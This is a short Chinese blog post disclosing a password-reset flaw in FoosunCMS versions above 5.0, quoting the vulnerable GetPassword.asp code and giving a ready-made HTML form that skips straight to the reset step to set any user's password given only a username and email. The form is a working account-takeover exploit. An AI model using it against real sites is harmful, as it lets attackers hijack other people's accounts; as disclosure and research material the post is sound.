Chinadu's Blog

发布时间:2010-07-02
影响版本:
FooSun > 5.0
漏洞描述:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

在文件\User\ GetPassword.asp中：

ElseIf Request.Form("Action") = "step3" then //第28行
Call step3()
……
Sub step3() //第198行
Dim p_pass_new,p_confim_pass_new
p_pass_new = md5(Request.Form("pass_new"),16)
……
User_Conn.execute("Update FS_ME_Users set UserPassword ='"& NoSqlHack(p_pass_new) &"' where UserName = '"& NoSqlHack(StrUserName) &"' and Email = '"& NoSqlHack(Replace(Request.Form("Email"),"''",""))&"'") //第220行
用户可以本地构造表单使程序直接进入修改密码，只需要知道用户名和邮箱。

<*参考 Bug.Center.Team *>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<form id="form1" name="form1" method="post" action="http://ssvdb.com/User/GetPassword.asp">

<input name="Action" type="text" id="Action" value="step3" />

<input name="pass_new" type="text" id="pass_new" value="123456" />

<input name="confim_pass_new" type="text" id="confim_pass_new" value="123456" />

<input name="Email" type="text" id="Email" value="bb@126.com" />

<input name="UserName" type="text" id="UserName" value="bb" />

<input type="submit" name="Submit" value="提交" />

</form>

相关文章

• 2007年01月7日 -- 风讯VIF IIS防火墙3.35专业版
• 2011年09月21日 -- WPA2不再安全 无线加密协议曝惊天漏洞
• 2010年08月3日 -- 黑帽大会：HTTPS和SSL存在安全漏洞
• 2010年05月8日 -- JBoss企业应用平台JMX控制台安全绕过漏洞
• 2010年03月17日 -- 网页编辑器漏洞手册
• 2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
• 2009年12月28日 -- fckeditor漏洞,通杀PHPMPS
• 2009年11月14日 -- Discuz!NT 3.0 特殊环境下利用漏洞
• 2009年11月2日 -- XOOPS 2.2.6 鸡肋本地包含漏洞
• 2009年10月7日 -- 封堵Windows Server 2008几个明显漏洞